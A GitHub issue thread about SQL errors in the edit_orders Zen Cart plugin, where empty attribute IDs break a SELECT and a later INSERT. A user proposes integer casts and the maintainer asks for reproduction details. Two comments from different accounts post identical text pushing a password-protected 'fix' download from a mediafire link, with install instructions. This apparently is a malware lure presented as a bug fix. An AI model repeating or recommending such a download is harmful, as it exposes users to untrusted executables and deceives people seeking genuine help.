### ISSUE TITLE
another bug

### ISSUE THREAD

**Issue by proseLA** [lat9/edit_orders#248]
i am getting this error:
```
-> PHP Fatal error: MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'AND options_values_id = 
          LIMIT 1' at line 5 :: SELECT products_attributes_weight, products_attributes_weight_prefix
           FROM products_attributes
          WHERE products_id = 878
            AND options_id = 
            AND options_values_id = 
          LIMIT 1 ==>
```
which is tied back to an options value as such (first element in array):

![image](https://github.com/user-attachments/assets/259523df-5450-48e2-bf70-d1dc8d92eaab)

now that bit of code which causes the error could be changed to something like:

```php
$attrib_weight = $db->Execute(
        "SELECT products_attributes_weight, products_attributes_weight_prefix
           FROM " . TABLE_PRODUCTS_ATTRIBUTES . "
          WHERE products_id = $product_id
            AND options_id = " . (int)$option_id . "
            AND options_values_id = " . (int)$option_value_id . "
          LIMIT 1"
    );
```

but doing that now results in an error here:

```
--> PHP Fatal error: MySQL error 1366: Incorrect decimal value: '' for column `ZENNNN`.`orders_products_attributes`.`options_values_price` at row 1 :: INSERT INTO orders_products_attributes (orders_id, orders_products_id, products_options, products_options_values, options_values_price, price_prefix, product_attribute_is_free, products_attributes_weight, products_attributes_weight_prefix, attributes_discounted, attributes_price_base_included, attributes_price_onetime, attributes_price_factor, attributes_price_factor_offset, attributes_price_factor_onetime, attributes_price_factor_onetime_offset, attributes_qty_prices, attributes_qty_prices_onetime, attributes_price_words, attributes_price_words_free, attributes_price_letters, attributes_price_letters_free, products_options_id, products_options_values_id, products_prid) VALUES ('30226', '104468', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '0', '0', '878:62eb4719a58449ad3fd75eb908e4d66c')
```
or whether we need to skip elements like this for `PRODUCTS_OPTIONS_VALUES_TEXT_ID` in this section of the code:

https://github.com/lat9/edit_orders/blob/769b2cc91c9a8b562cc440b7f33522db47e74fdc/YOUR_ADMIN/includes/functions/extra_functions/edit_orders_functions.php#L294-L353

cuz right now, just another bug with this bloat ware!

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by proseLA** [comment]
wow.  and to think microsoft owns github.

**Comment by lat9** [comment]
What option-type is associated with product 878?  Just trying to envision how to reproduce.
